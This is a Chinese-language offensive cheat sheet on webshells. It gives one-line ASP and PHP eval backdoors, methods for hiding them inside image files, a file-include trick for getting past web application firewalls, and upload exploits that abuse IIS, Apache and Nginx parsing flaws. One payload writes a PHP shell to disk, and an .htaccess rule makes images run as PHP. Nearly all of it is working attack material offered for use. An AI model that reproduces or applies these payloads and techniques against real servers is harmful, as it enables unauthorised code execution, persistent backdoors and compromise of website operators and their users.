一句话木马
asp:<%eval request("heroes")%>
php:<?php @eval($_POST[value]);?>
asp:<%@ Page Language="Jscript"%>
<%eval(Request.Item["value"])%>
一句话木马制作:
c32:把图片放入里边,再写入一句话
cmd:copy /b 1.jpg+1.asp 2.jpg
win7下右键图片,在属性->详细信息->版权内插入一句话
小马体积小,容易隐藏,与图片结合一起上传后可以利用nigx或者IIS6的解析漏洞来运行,不过功能少,一般只有上传等功能。
大马体积比较大,一般50K以上。功能丰富,一般包含提权命令,磁盘管理,数据库连接接口,执行命令,有些甚至可以压缩/解压缩网站程序。这种马的隐蔽性较差,大多数代码如果不加密的话会被杀。
文件包含绕过waf
1,上传包含文件bao.asp:<!--include file="1.jpg"--> 将当前文件目录下1.jpg包含到asp中执行
2,上传图片文件1.jpg:其中其实是木马
waf不会发现1.jpg中的内容,也不会对包含文件进行拦截,因为其中没有恶意代码。
文件解析漏洞
一些特殊文件被iis、apache、nginx在某种情况下被解释成脚本文件的漏洞。
IIS5.x-6.0解析漏洞
1,目录解析:/xx.asp/1.jpg
在网站文件夹下建立文件夹名字为.asp、.asa的文件夹,其目录内的任何扩展名的文件都会被IIS当成asp文件来解释或执行
2,文件解析:cracer.asp;.jpg
在IIS6.0下,分号后边的不被解析。除了asp之外还有.asa/.cer/.cdx
Apache解析漏洞
Apache从右向左开始判断解析,如果为不可识别解析,就再往左判断。比如cracer.php.owf.rar,“.owf”和".rar"Apache不能识别,于是就会最终解析成cracer.php
IIS7.0/IIS7.5/Nginx<8.03畸形解析漏洞
在默认Fast-CGI开启的状况下,上传一个名为cracer.jpg的文件,其中内容为<? PHP fputs(fopen('shell.php','w'),'<?php eval($_POST[cmd])?>');?>然后访问cracer.jpg/.php,在这个目录下就会生成一句话木马shell.php
www.xxx.com/logo.gif/*.php触发漏洞(有漏洞会把前面文件当成php执行)
htaccess文件解析
如果在Apache中,.htaccess可被执行且可被上传,则可以尝试在其中写入:
<FilesMatch "shell.jpg"> SetHandler application/x-httpd-php </FilesMatch>
然后再上传shell.jpg木马,这样就可以将其解析成.php文件